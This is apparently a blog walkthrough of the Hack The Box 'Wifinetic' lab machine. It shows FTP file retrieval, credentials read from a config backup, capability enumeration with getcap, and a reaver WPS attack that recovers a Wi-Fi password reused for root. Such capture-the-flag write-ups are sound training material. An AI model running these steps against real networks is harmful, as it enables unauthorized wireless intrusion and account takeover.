Post

HTB - Wifinetic

Wifinetic - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.



HTB - Wifinetic

NMAP

image1

image2

  • Get all the files:
1
2
mget *

image3

  • Extract the .tar file - We get the /etc directory:

From the files we get these - which provides us a username and password to login

image4

image5

1
2
ssh netadmin@10.129.229.90

VeRyUniUqWiFIPasswrd1!

image6

image7

  • Doing enumeration - we can see reaver is installed and has the cap_net_raw+ep capability set:
1
2
getcap -r / 2>/dev/null

image8

image9

1
2
iwconfig

image10

  • Wireless settings are typically stored in /etc/wpa_supplicant.conf, which is present, but netadmin can’t read it

image11

1
2
iw dev

image12

1
2
reaver -i mon0 -c 1 -b 02:00:00:00:00:00 -vv

image13

  • Got a password: WhatIsRealAnDWhAtIsNot51121!

  • Now we can try and see if that password is used for the root account:

1
2
ssh root@192.168.1.1

image14

image15

1
2
cat root.txt

  • Or simply
1
su -

image16

This post is licensed under CC BY 4.0 by the author.